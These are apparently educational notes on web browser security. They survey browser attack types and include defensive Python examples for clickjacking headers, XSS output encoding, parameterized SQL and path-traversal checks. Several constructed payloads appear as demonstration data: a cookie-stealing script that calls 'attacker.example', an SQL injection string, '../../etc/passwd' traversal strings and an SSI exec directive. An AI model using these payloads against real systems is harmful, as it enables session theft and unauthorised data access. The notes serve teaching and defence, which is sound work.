Web Browsers

Updated Fri Apr 24 2026 07:36:29 GMT+0000 (Coordinated Universal Time)

Software that connects to web servers, retrieves web content, renders it for the user, and sends user data back to websites. It is the main gateway to the internet for most users.

  • Retrieves and renders web pages.
  • Sends user inputs to websites.
  • Used on desktops, laptops, tablets, and mobile devices.
  • Some applications embed browser functionality.

Because they are so widely used, browsers are a major target for cyber attacks.

Browsers are a major security concern because they process content from many untrusted sources:

  • A single web page can load resources (scripts, images, frames, fonts) from many different domains.
  • Browser add-ons and extensions run with broad access to page content and may contain malicious code.
  • Some data transfers (cookies, prefetches, tracking requests) happen automatically, without the user being aware of them.
  • Scripts run in the background with no visible indication to the user.

Browser Vulnerabilities

Weaknesses in browser software or its components that attackers exploit to access data or compromise the underlying system. Browsers make attractive targets because:

  • They are installed on almost every device.
  • They parse complex, attacker-controlled content (HTML, CSS, JavaScript, images, audio and video).
  • They allow third-party extensions and plug-ins, which widen the attack surface.

Browser Attack Vectors

An attack vector is the path or method used by an attacker to exploit a vulnerability.

Common browser attack vectors:

  • Operating system compromise
  • Intercepting browser communication
  • Malicious browser extensions
  • Compromised websites

Browser Attack Types

Man-in-the-Browser (MITB)

Malicious code running inside the browser process (typically installed as a plug-in, extension or by malware) intercepts and manipulates communication between the user and a website.

Because it operates after TLS decryption and before TLS encryption, HTTPS does not protect against it: the attacker sees pages as the user sees them and can change what is submitted.

Typical goals: capture login credentials and other authentication data, and alter transaction details (for example the payee or amount of a bank transfer) while showing the user the values they expected.

Keystroke Logger

Records every key typed on a keyboard. Can be implemented either as a hardware device (for example a small USB dongle placed between keyboard and computer) or as malware running on the system. Captures passwords, financial information and any other private data the user types.

Not limited to browsers, may affect the entire system.

Page-in-the-Middle

Redirects the user to an attacker-controlled page that imitates the legitimate one, so input typed into it goes to the attacker. The effect is similar to MITB, but achieved by swapping the page rather than hooking the browser.

Program Download Substitution

An attack where legitimate software downloads are replaced with malware.

User-in-the-Middle

Manipulates users into performing actions on the attacker's behalf. For example, a clickbait page lures users into solving CAPTCHAs, and the solved answers are relayed to spammers' sign-up scripts.

Clickjacking

Tricks the user into clicking hidden or disguised interface elements, so that the user unknowingly performs an action on another site (such as confirming a purchase or granting a permission).

For example: the target site is loaded in a transparent iframe positioned over a visible decoy button on the attacker's page; the user thinks they are clicking the decoy but actually clicks the target site's button.
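The overlay trick above only works if the target page can be loaded in a frame by an arbitrary site. The following added example (not code from the original notes) checks an HTTP response's headers for the two standard anti-framing controls, X-Frame-Options and the frame-ancestors directive of Content-Security-Policy, and reports whether a third-party page could still frame it. The header dictionaries in the demo are constructed samples.

```python
# Added example, not from the original notes: does this response allow framing
# by an arbitrary third-party origin (the precondition for clickjacking)?


def csp_directive(csp: str, name: str):
    """Return the source list of one CSP directive, or None if it is absent."""
    for part in csp.split(";"):
        tokens = part.strip().split()
        if tokens and tokens[0].lower() == name:
            return [t.lower() for t in tokens[1:]]
    return None


def frameable_by_third_party(headers: dict) -> bool:
    """True if an attacker-controlled origin could load this page in an <iframe>."""
    h = {k.lower(): v for k, v in headers.items()}

    # When both mechanisms are present, browsers honour CSP frame-ancestors
    # and ignore X-Frame-Options, so it is evaluated first.
    csp = h.get("content-security-policy")
    if csp is not None:
        ancestors = csp_directive(csp, "frame-ancestors")
        if ancestors is not None:
            # 'none', 'self', or a fixed list of origins all exclude an unknown
            # attacker origin; only a wildcard or a bare scheme source
            # ("https:") lets any site frame the page. An empty list blocks all.
            return any(src in ("*", "http:", "https:") for src in ancestors)

    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return False
    # No header, or an invalid/obsolete value such as ALLOW-FROM (which current
    # browsers ignore): the page can be framed.
    return True


if __name__ == "__main__":
    # Constructed sample responses, not captured from any real site.
    samples = {
        "no protection": {},
        "XFO deny": {"X-Frame-Options": "DENY"},
        "obsolete ALLOW-FROM": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
        "CSP none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
        "CSP wildcard overrides XFO": {
            "Content-Security-Policy": "frame-ancestors https:",
            "X-Frame-Options": "DENY",
        },
    }
    for label, hdrs in samples.items():
        print(f"{label:28s} frameable={frameable_by_third_party(hdrs)}")
```

The fix for a frameable page is to send `Content-Security-Policy: frame-ancestors 'none'` (or `'self'`), keeping `X-Frame-Options: DENY` for older browsers; JavaScript "frame-busting" alone is not reliable because the framing page can sandbox the iframe.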

Cross-Site Scripting

Aka. XSS. The attacker gets a script of their choosing into a web page, usually through user input that the site reflects back, stores and later displays, or feeds into the DOM without validation or output encoding. The script then runs in the victim's browser with the origin and privileges of the vulnerable site.

Can be used to hijack sessions, steal cookies, perform actions as the user, or manipulate the page's content.
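The following added example (not code from the original notes) shows the root cause and the fix side by side: a user-supplied display name interpolated into an HTML page as raw text, versus the same page built with output encoding. The payloads and the `attacker.example` host are constructed for the demonstration.

```python
import html

# Added example, not from the original notes: the same untrusted value rendered
# without output encoding (vulnerable) and with it (fixed).

PAGE = "<p>Welcome back, {name}!</p>"


def render_vulnerable(name: str) -> str:
    """Raw interpolation: whatever the user typed becomes markup in the page."""
    return PAGE.format(name=name)


def render_safe(name: str) -> str:
    """Encode &, <, >, " and ' so the value is displayed as text, not parsed as HTML.
    quote=True covers both quote characters, so the same call is also safe for
    a value placed inside a quoted attribute."""
    return PAGE.format(name=html.escape(name, quote=True))


def payload_survives(payload: str, rendered: str) -> bool:
    """True if the payload reached the output byte-for-byte (i.e. it would execute)."""
    return payload in rendered


# Constructed payloads: a cookie-stealing script and an attribute-based variant
# that needs no <script> tag at all.
PAYLOADS = [
    '<script>fetch("https://attacker.example/c?" + document.cookie)</script>',
    '<img src=x onerror="alert(document.domain)">',
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print("vulnerable:", render_vulnerable(p))
        print("safe:      ", render_safe(p))
        print("survives vulnerable =", payload_survives(p, render_vulnerable(p)),
              "| survives safe =", payload_survives(p, render_safe(p)))
```

Encoding must match the context the value lands in (HTML body, attribute, URL, JavaScript string); `html.escape` is correct for the first two but not for a value dropped inside a `<script>` block. Marking the session cookie `HttpOnly` keeps `document.cookie` from exposing it even if a script does run, which limits the damage of the first payload but does not stop the script from acting as the user.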

Web Bug / Tracking Pixel

A tiny (typically 1x1 pixel) invisible image embedded in a web page or email. Its URL is unique per recipient, so the request the browser or mail client makes to fetch it tells the tracker who opened the content, when, and from which IP address and client.

Tracks page views and email opens. Collects user behaviour data across sites when the same tracker is embedded in many pages.

Drive-By Download

A drive-by download installs malicious software when a user merely visits a web page, without any explicit permission or action on the user's part. It is typically triggered by scripts on the page that exploit a vulnerability in the browser, a plug-in, or the operating system.

SQL Injection

Occurs when user-supplied text is concatenated into an SQL statement, so that characters and keywords in the input change the structure of the query instead of being treated as a value.

Normal query (account number supplied by the user is 2468):

SELECT * FROM trans WHERE acct='2468';

Malicious query (the user supplies 2468' OR '1'='1 as the account number):

SELECT * FROM trans WHERE acct='2468' OR '1'='1';

The WHERE clause is now always true, so the query returns every transaction in the table rather than one account's. The correct fix is to use parameterized queries (prepared statements), which send the value separately from the statement text; validating input against an allow-list (for example, an account number must be all digits) is a useful second layer, but escaping or "normalizing" input on its own is error-prone and not sufficient.
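The following added example (not code from the original notes) runs the trans/acct query above both ways against an in-memory SQLite database with constructed sample rows: once built by string concatenation, once with a bound parameter, plus the allow-list check recommended as a second layer.

```python
import sqlite3

# Added example, not from the original notes: the notes' trans/acct lookup with and
# without parameter binding. The table contents are constructed sample data.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE trans (id INTEGER PRIMARY KEY, acct TEXT, amount REAL)")
    conn.executemany(
        "INSERT INTO trans (acct, amount) VALUES (?, ?)",
        [("2468", 120.00), ("2468", -35.50), ("1357", 999.99), ("9001", 42.00)],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, acct: str) -> list:
    """String concatenation: the user's text becomes part of the SQL grammar."""
    sql = "SELECT acct, amount FROM trans WHERE acct='" + acct + "';"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, acct: str) -> list:
    """Placeholder binding: the driver passes the value separately from the statement,
    so quotes and keywords inside it are just characters of the account string."""
    return conn.execute("SELECT acct, amount FROM trans WHERE acct=?", (acct,)).fetchall()


def valid_acct(acct: str) -> bool:
    """Allow-list check for defence in depth: account numbers are 1-12 digits."""
    return acct.isdigit() and 1 <= len(acct) <= 12


if __name__ == "__main__":
    conn = make_db()
    for user_input in ["2468", "2468' OR '1'='1"]:
        print(f"input {user_input!r}: allow-list ok = {valid_acct(user_input)}")
        print("  concatenated :", lookup_vulnerable(conn, user_input))
        print("  parameterized:", lookup_parameterized(conn, user_input))
```

With the injected input the concatenated version returns all four rows; the parameterized version returns nothing, because no account is literally named `2468' OR '1'='1`. The allow-list check rejects the input before a query is even built.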

Directory Traversal

Directory traversal (path traversal) uses sequences like ../ in a file name supplied to the server to climb out of the intended directory and read restricted files.

Example:

http://example.com/../../etc/passwd

In practice browsers normalize ../ in the URL path before sending the request, so the sequence is usually supplied inside a parameter value (for example ?file=../../etc/passwd) or percent-encoded (%2e%2e%2f) to evade simple string filters.
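The following added example (not code from the original notes) shows the server-side check that stops this: resolve the requested name against a fixed document root and refuse anything whose real path ends up outside it, including percent-encoded variants. The document root and requests are constructed samples; no files are read.

```python
import os
from urllib.parse import unquote

# Added example, not from the original notes: confine a client-supplied file name
# to a document root. Paths used in the demo are constructed; nothing is opened.


def safe_join(doc_root: str, requested: str) -> str:
    """Return the absolute path for `requested` under doc_root, or raise PermissionError.

    Assumes the application receives the raw request string and decodes it once;
    adjust if your framework has already decoded it."""
    # Decode once so %2e%2e%2f is seen as ../ rather than slipping past a filter.
    decoded = unquote(requested)
    # Drop a leading slash: os.path.join would otherwise discard doc_root entirely.
    relative = decoded.lstrip("/\\")
    root = os.path.realpath(doc_root)
    # realpath collapses . and .. and follows symlinks, so the check below sees the
    # file that would really be opened.
    candidate = os.path.realpath(os.path.join(root, relative))
    # commonpath rather than startswith: "/var/www/html-private" starts with
    # "/var/www/html" but is not inside it.
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"path escapes document root: {requested!r}")
    return candidate


def is_allowed(doc_root: str, requested: str) -> bool:
    """Boolean wrapper for reporting and tests."""
    try:
        safe_join(doc_root, requested)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    root = "/var/www/html"  # constructed document root
    for req in ["img/logo.png", "../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd",
                "/etc/passwd", "docs/../../html-private/secret"]:
        print(f"{req:32s} allowed={is_allowed(root, req)}")
```

Note that `/etc/passwd` is accepted: after the leading slash is stripped it resolves to `/var/www/html/etc/passwd`, which is inside the root and therefore harmless. Serving files as a dedicated low-privilege user, with the document root mounted read-only, limits the damage if a check like this is ever bypassed.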

Server-Side Include Injection

An attack that injects server-side include (SSI) directives, such as <!--#exec cmd="..." -->, into pages that the web server processes for SSI before sending them. User input that is written into such a page without encoding is interpreted as a directive.

Can be used to execute unintended commands on the server and to read protected files. The same output encoding that prevents XSS (encoding < so the directive opener <!--# cannot appear) also prevents SSI injection.

Countermeasures

  • Treat all input as untrusted, including headers, cookies and values from the application's own front end.
  • Validate all input on the server side against an allow-list of expected formats; client-side validation improves usability but is trivially bypassed and provides no security.
  • Encode output for the context it is placed in (HTML, attribute, URL, SQL) rather than trying to strip "dangerous" characters from input.
  • Use parameterized queries (prepared statements) for every database access.
  • Apply strict access control on the backend so that a successful injection reaches as little as possible.

OWASP Top 10

The Open Web Application Security Project (aka. OWASP, since 2023 the Open Worldwide Application Security Project) publishes a regularly updated list of the most critical web application security risks. The 2021 edition:

  1. Broken Access Control
  2. Cryptographic Failures
  3. Injection (including SQL injection and XSS)
  4. Insecure Design
  5. Security Misconfiguration
  6. Vulnerable and Outdated Components
  7. Identification and Authentication Failures
  8. Software and Data Integrity Failures
  9. Security Logging and Monitoring Failures
  10. Server-Side Request Forgery (SSRF)